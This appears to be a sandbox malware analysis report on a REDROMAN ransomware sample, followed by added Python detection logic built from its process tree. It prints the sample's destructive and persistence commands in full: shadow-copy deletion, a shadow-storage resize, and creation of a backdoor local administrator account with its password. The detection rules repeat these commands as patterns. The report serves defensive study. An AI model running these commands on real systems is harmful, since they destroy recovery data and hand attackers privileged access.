Resubmissions
19-11-2020 14:39  201119-59epbrqadx  score 10
19-11-2020 14:22  201119-ff99dc42e6  score 10
19-11-2020 14:16  201119-298y5e8ncj  score 9
Analysis
Max time kernel: 135s
Max time network: 137s
Platform: windows7_x64
Resource: win7v20201028
Submitted: 19-11-2020 14:16
Static task: static1
Behavioral task: behavioral1
  Sample: f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
  Resource: win10v20201028
General
Target: f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
Size: 1.8MB
MD5: 10d7151b9ee53b8da8ee6f85001ffb20
SHA1: 76d33ef58ea7b012342d975d871db64840da9675
SHA256: f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093
SHA512: 1c6d2d7f509b462b5d48db61817ee42a7204d10141c59394eb190d0dba733b831a6344bb85197dfac358939379e640c9f38732d376e28f92e187806ca574d10f
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often deletes Volume Shadow Copies so the victim cannot restore files from them. Here this is done by two vssadmin calls launched from the elevated batch file C:\ProgramData\amdkey.bat.
- Grants admin privileges (1 TTPs)
  Uses net.exe to create a new local user (RedROMAN) and add it to the local Administrators group, leaving the attacker a privileged account on the host.
- Modifies extensions of user files (3 IoCs)
  Ransomware generally changes the extension of the files it encrypts; this sample appends .REDROMAN.
  Processes:
    f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
      File created: C:\Users\Admin\Pictures\UseInstall.tif.REDROMAN
      File opened for modification: C:\Users\Admin\Pictures\BlockSave.tiff
      File created: C:\Users\Admin\Pictures\BlockSave.tiff.REDROMAN
- Drops startup file (1 IoCs)
  An HTML file is written to the user's Startup folder, so it is opened at every logon; this is the usual way ransomware keeps its note in front of the victim.
  Processes:
    f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
      File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html
- Modifies service (2 TTPs, 5 IoCs)
  These keys are written by the legitimate VSS service (vssvc.exe) while it enumerates its writers in response to the vssadmin calls; they are a by-product of the shadow-copy tampering, not a service modification made by the sample itself.
  Processes:
    vssvc.exe
      Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
      Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
      Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
      Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
      Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
- Interacts with shadow copies (2 TTPs, 2 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery. PID 1168 deletes every shadow copy ("Delete Shadows /All /Quiet"); PID 2516 then shrinks the shadow storage for C: to 320MB ("Resize ShadowStorage"), which makes VSS discard existing copies that no longer fit, so the copies are lost even if the delete was blocked.
  Processes:
    1168 vssadmin.exe
    2516 vssadmin.exe
- Runs net.exe
  Processes:
    2548 net.exe
    2588 net.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    1492 powershell.exe
    580 powershell.exe
- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes:
    1492 powershell.exe: Token: SeDebugPrivilege
    580 powershell.exe: Token: SeDebugPrivilege
    2392 vssvc.exe: Token: SeBackupPrivilege
    2392 vssvc.exe: Token: SeRestorePrivilege
    2392 vssvc.exe: Token: SeAuditPrivilege
- Suspicious use of WriteProcessMemory (27 IoCs)
  Every parent below wrote to its child's memory three times; such writes accompany ordinary process creation (the parent initialising the new child), so they appear for each parent/child pair and are not by themselves evidence of injection. The pairs give the process tree.
  Processes (parent PID -> child PID, 3 writes each):
    756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe -> 1492 powershell.exe
    756 f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe -> 580 powershell.exe
    580 powershell.exe -> 768 cmd.exe
    768 cmd.exe -> 1168 vssadmin.exe
    768 cmd.exe -> 2516 vssadmin.exe
    768 cmd.exe -> 2548 net.exe
    2548 net.exe -> 2560 net1.exe
    768 cmd.exe -> 2588 net.exe
    2588 net.exe -> 2600 net1.exe
Processes (PIDs taken from the IoC lists above; indentation shows parent/child)
- [756] C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe"
  Modifies extensions of user files; Drops startup file; Suspicious use of WriteProcessMemory
  - [1492] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" -WindowStyle Hidden get-wmiobject win32_computersystem | "fl model"
    Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - [580] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell" Start-Process C:\ProgramData\amdkey.bat -Verb runas
    Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - [768] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"
      Suspicious use of WriteProcessMemory
      - [1168] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin.exe Delete Shadows /All /Quiet
        Interacts with shadow copies
      - [2516] C:\Windows\system32\vssadmin.exe
        Command line: vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB
        Interacts with shadow copies
      - [2548] C:\Windows\system32\net.exe
        Command line: net user /add RedROMAN p4zzaub71h
        Suspicious use of WriteProcessMemory
        - [2560] C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 user /add RedROMAN p4zzaub71h
      - [2588] C:\Windows\system32\net.exe
        Command line: net localgroup administrators RedROMAN /add
        Suspicious use of WriteProcessMemory
        - [2600] C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 localgroup administrators RedROMAN /add
- [2392] C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Modifies service; Suspicious use of AdjustPrivilegeToken
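The behaviours this report flags map directly onto process-creation and file-creation telemetry. The block below is an added example, not Triage output or code from the sample: it encodes the report's process tree and file IoCs as constructed events (the record layout, standing in for Sysmon event IDs 1 and 11, is an assumption; PIDs, parents, paths and command lines are copied from the report), runs command-line rules for the shadow-copy deletion, shadow-storage resize, local-account creation, Administrators-group addition and the PowerShell -Verb runas elevation, detects the uniform appended extension and the Startup-folder drop, and walks parent pointers so that a vssadmin or net1 hit is attributed back to the sample at PID 756 rather than to cmd.exe.

```python
"""Detection logic for the behaviours in this report, run over constructed
events (added example; not part of the report or the sample)."""
import re
from collections import Counter, namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")   # assumed event layout
FileEvt = namedtuple("FileEvt", "pid path")           # assumed event layout

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\f0fbd0654d4bf299c08f1f83e7b6c3a1f332b49c24b3cf0b9b87757b8c13f093.bin.sample.exe")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS = r"C:\Windows\system32"

# Process-creation events constructed from the report's tree (ppid 0 = parent not listed).
PROCS = [
    Proc(756, 0, SAMPLE, f'"{SAMPLE}"'),
    Proc(1492, 756, PS, "powershell -WindowStyle Hidden get-wmiobject win32_computersystem | fl model"),
    Proc(580, 756, PS, r"powershell Start-Process C:\ProgramData\amdkey.bat -Verb runas"),
    Proc(768, 580, SYS + r"\cmd.exe", r'"C:\Windows\System32\cmd.exe" /C "C:\ProgramData\amdkey.bat"'),
    Proc(1168, 768, SYS + r"\vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet"),
    Proc(2516, 768, SYS + r"\vssadmin.exe", "vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB"),
    Proc(2548, 768, SYS + r"\net.exe", "net user /add RedROMAN p4zzaub71h"),
    Proc(2560, 2548, SYS + r"\net1.exe", SYS + r"\net1 user /add RedROMAN p4zzaub71h"),
    Proc(2588, 768, SYS + r"\net.exe", "net localgroup administrators RedROMAN /add"),
    Proc(2600, 2588, SYS + r"\net1.exe", SYS + r"\net1 localgroup administrators RedROMAN /add"),
]
BY_PID = {p.pid: p for p in PROCS}

# File-creation events constructed from the report's IoC lists.
FILES = [
    FileEvt(756, r"C:\Users\Admin\Pictures\UseInstall.tif.REDROMAN"),
    FileEvt(756, r"C:\Users\Admin\Pictures\BlockSave.tiff.REDROMAN"),
    FileEvt(756, r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OPENTHIS.html"),
]

# Command-line rules, one per behaviour the report flags.
CMD_RULES = {
    "shadow_copy_delete":    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "shadow_storage_resize": re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b", re.I),
    "local_user_add":        re.compile(r"\bnet1?(\.exe)?\s+user\b.*\s/add\b", re.I),
    "local_admin_add":       re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b", re.I),
    "powershell_runas":      re.compile(r"\bpowershell\b.*start-process\b.*-verb\s+runas\b", re.I),
}
STARTUP = r"\start menu\programs\startup"   # matched case-insensitively below


def flag_commands(procs=PROCS):
    """Return {(rule_name, pid)} for every process whose command line matches a rule."""
    return {(name, p.pid) for p in procs for name, rx in CMD_RULES.items() if rx.search(p.cmdline)}


def root_ancestor(pid, by_pid=BY_PID):
    """Follow ppid links to the topmost process we hold a record for."""
    while pid in by_pid and by_pid[pid].ppid in by_pid:
        pid = by_pid[pid].ppid
    return pid


def chain(pid, by_pid=BY_PID):
    """Image basenames from the root down to pid (sample -> powershell -> cmd -> vssadmin)."""
    out = []
    while pid in by_pid:
        out.append(by_pid[pid].image.rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid].ppid
    return list(reversed(out))


def flag_files(files=FILES, min_renames=2):
    """Ransomware-style renames (stem.origext.NEWEXT with one uniform NEWEXT per
    process) and drops into the Startup folder. min_renames is deliberately low
    to fit the three events the report lists; tune upward on real telemetry."""
    suffixes, startup_drops = {}, set()
    for ev in files:
        if STARTUP in ev.path.lower():
            startup_drops.add(ev.pid)
        parts = ev.path.rsplit("\\", 1)[-1].split(".")
        if len(parts) >= 3:                       # original extension still present
            suffixes.setdefault(ev.pid, Counter())["." + parts[-1]] += 1
    renames = {pid: {s for s, n in c.items() if n >= min_renames} for pid, c in suffixes.items()}
    return {"ransom_extension": {pid: s for pid, s in renames.items() if s},
            "startup_drop": startup_drops}


if __name__ == "__main__":
    for rule, pid in sorted(flag_commands(), key=lambda h: h[1]):
        print(f"{rule:22s} pid={pid:<5d} root={root_ancestor(pid)}  chain={' -> '.join(chain(pid))}")
    print(flag_files())
```

Every command-line hit resolves to root 756, so the detections can be raised against the sample rather than against cmd.exe or net1.exe, which is what an analyst needs when the batch file and the elevated PowerShell sit between them. The rules deliberately accept net1.exe as well as net.exe, because net.exe only forwards to net1.exe and a rule keyed on net.exe alone would miss direct net1 invocations.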
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
Only the first file is an attacker artifact: amdkey.bat is the batch script the sample writes to C:\ProgramData and then elevates via PowerShell -Verb runas; it holds the vssadmin and net commands seen in the process tree. The other two are side effects of running PowerShell and Explorer in the sandbox (PowerShell's command-analysis cache and a jump-list file), not dropped payloads.
- C:\ProgramData\amdkey.bat
  MD5: e1ccfa2c9fccc3306d6a2beafee97e88
  SHA1: 769a6f5692364611fb1c97b7f8909e305df46b0c
  SHA256: 8c6a13f418d0c11640ea15a0c42a4edc9f4175c4c924573c35b86929a7d25aaf
  SHA512: f5ecf42ded57faa60cd98f7e43438c7b7158afb7061b836805469840880ae6b980dfe99f66bce8b52f2fa27eb0d07a48631da8f8fb82a3f12754a2024d70460c
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: a04b904ec4a4fd5c196bc393d6909e61
  SHA1: 5f9caea37f8f29f80e3840bcdc2bca718da1dfa0
  SHA256: 1b860670ed085ad5181b2d54e06b4540130c6ae50d12e2caa0eeb5f93404732a
  SHA512: d2fa346c81c036a83aeb26aad639e0b4ff396421f968e0a3fe82bdc293214946c28b71a817f9c888ac01e1d5431d8e0c1f371272489228e5d4c50282716c75c0
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 9f4fb4e2047da217377c0ad64ef5b008
  SHA1: 2ecec5eedcec1a1a6b065e33a8260bb5cf6116a0
  SHA256: 36fc811b999c5b690cd9bf4ebdbd39c984a94136dd0aa5746a3edaf2c7c50923
  SHA512: d66ccd4a90e6b509cbe5379a28f098d2cf2f05ab3de3b90321e956a1080c470f852cdf5f8181a494e34bba5f22b61529bc8915d6017a528ad56b9afeefdef6d4
Memory dumps (the 1.8MB region in PID 756 is the sample's own image; the 9.9MB regions at 0x000007FEF... in both PowerShell processes lie in the Windows 7 x64 system-DLL range and are mapped system modules, not injected code)
- memory/580-12-0x0000000002280000-0x0000000002281000-memory.dmp  4KB
- memory/580-14-0x0000000002440000-0x0000000002441000-memory.dmp  4KB
- memory/580-17-0x000000001BC40000-0x000000001BC41000-memory.dmp  4KB
- memory/580-15-0x0000000002510000-0x0000000002511000-memory.dmp  4KB
- memory/580-13-0x000000001AE40000-0x000000001AE41000-memory.dmp  4KB
- memory/580-11-0x000007FEF5F30000-0x000007FEF691C000-memory.dmp  9.9MB
- memory/580-9-0x0000000000000000-mapping.dmp
- memory/756-0-0x000000013F8A0000-0x000000013FA71000-memory.dmp  1.8MB
- memory/768-19-0x0000000000000000-mapping.dmp
- memory/1168-20-0x0000000000000000-mapping.dmp
- memory/1492-1-0x0000000000000000-mapping.dmp
- memory/1492-4-0x000000001AC60000-0x000000001AC61000-memory.dmp  4KB
- memory/1492-6-0x00000000027B0000-0x00000000027B1000-memory.dmp  4KB
- memory/1492-2-0x000007FEF5FA0000-0x000007FEF698C000-memory.dmp  9.9MB
- memory/1492-5-0x00000000024A0000-0x00000000024A1000-memory.dmp  4KB
- memory/1492-3-0x0000000002270000-0x0000000002271000-memory.dmp  4KB
- memory/1492-7-0x000000001B6C0000-0x000000001B6C1000-memory.dmp  4KB
- memory/1492-8-0x000000001C4F0000-0x000000001C4F1000-memory.dmp  4KB
- memory/2516-21-0x0000000000000000-mapping.dmp
- memory/2548-22-0x0000000000000000-mapping.dmp
- memory/2560-23-0x0000000000000000-mapping.dmp
- memory/2588-24-0x0000000000000000-mapping.dmp
- memory/2600-25-0x0000000000000000-mapping.dmp